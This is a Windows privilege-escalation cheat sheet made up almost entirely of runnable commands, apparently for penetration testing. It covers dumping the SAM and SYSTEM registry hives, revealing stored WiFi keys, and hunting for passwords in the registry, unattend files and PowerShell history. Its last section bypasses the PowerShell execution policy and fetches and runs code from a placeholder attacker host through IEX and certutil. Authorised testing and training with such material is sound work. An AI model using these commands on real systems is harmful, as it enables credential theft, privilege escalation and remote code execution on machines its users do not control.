# Windows Privilege Escalation - Manual Enumeration

# ============================================
# System info
# ============================================

systeminfo
hostname
whoami /all
whoami /priv
whoami /groups
net user
net user %username%
net localgroup
net localgroup Administrators

# ============================================
# Interesting privileges (for privesc)
# ============================================

# SeImpersonatePrivilege -> Potato attacks
# SeAssignPrimaryTokenPrivilege -> Potato attacks
# SeBackupPrivilege -> Read any file
# SeRestorePrivilege -> Write any file
# SeTakeOwnershipPrivilege -> Own any file
# SeDebugPrivilege -> Inject into processes
# SeLoadDriverPrivilege -> Load kernel drivers

whoami /priv

# ============================================
# Passwords & credentials
# ============================================

# Saved credentials
cmdkey /list

# SAM & SYSTEM (need admin or backup priv)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Unattended install files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep\sysprep.xml
type C:\Windows\system32\sysprep\sysprep.inf

# Registry passwords
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# ============================================
# Services
# ============================================

# List services
sc query
sc query state= all
wmic service get name,startname,pathname
Get-Service (PowerShell)

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# Weak service permissions
sc qc <service_name>
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# ============================================
# Scheduled tasks
# ============================================

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i "Task To Run"
Get-ScheduledTask (PowerShell)

# ============================================
# Installed software
# ============================================

dir "C:\Program Files"
dir "C:\Program Files (x86)"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s
wmic product get name,version

# ============================================
# Network
# ============================================

ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles

# ============================================
# File search
# ============================================

# Search for passwords in files
findstr /si password *.txt *.ini *.config *.xml
findstr /spin "password" *.*

# Search for specific files
dir /s *pass* == *cred* == *vnc* == *.config*
where /r C:\ *.ini
where /r C:\ *password*

# ============================================
# AlwaysInstallElevated
# ============================================

# If both are 1, can install MSI as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# ============================================
# AutoRuns
# ============================================

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

# Startup folders
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# ============================================
# DLL Hijacking
# ============================================

# Check PATH
echo %PATH%

# Missing DLLs (use Process Monitor to find)
# Then place malicious DLL in writable PATH directory

# ============================================
# Kernel exploits
# ============================================

systeminfo
# Then use: windows-exploit-suggester.py --database <db> --systeminfo <file>

# Or use Watson, Sherlock (PowerShell)
# Or winPEAS

# ============================================
# Token impersonation
# ============================================

# Check privileges
whoami /priv

# If SeImpersonatePrivilege:
# - JuicyPotato
# - PrintSpoofer
# - RoguePotato
# - GodPotato
# - SweetPotato

# ============================================
# PowerShell useful commands
# ============================================

# Execution policy bypass
powershell -ep bypass
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass

# Download files
Invoke-WebRequest -Uri "http://attacker/file" -OutFile "C:\temp\file"
(New-Object Net.WebClient).DownloadFile("http://attacker/file","C:\temp\file")
certutil -urlcache -split -f "http://attacker/file" C:\temp\file

# Run in memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
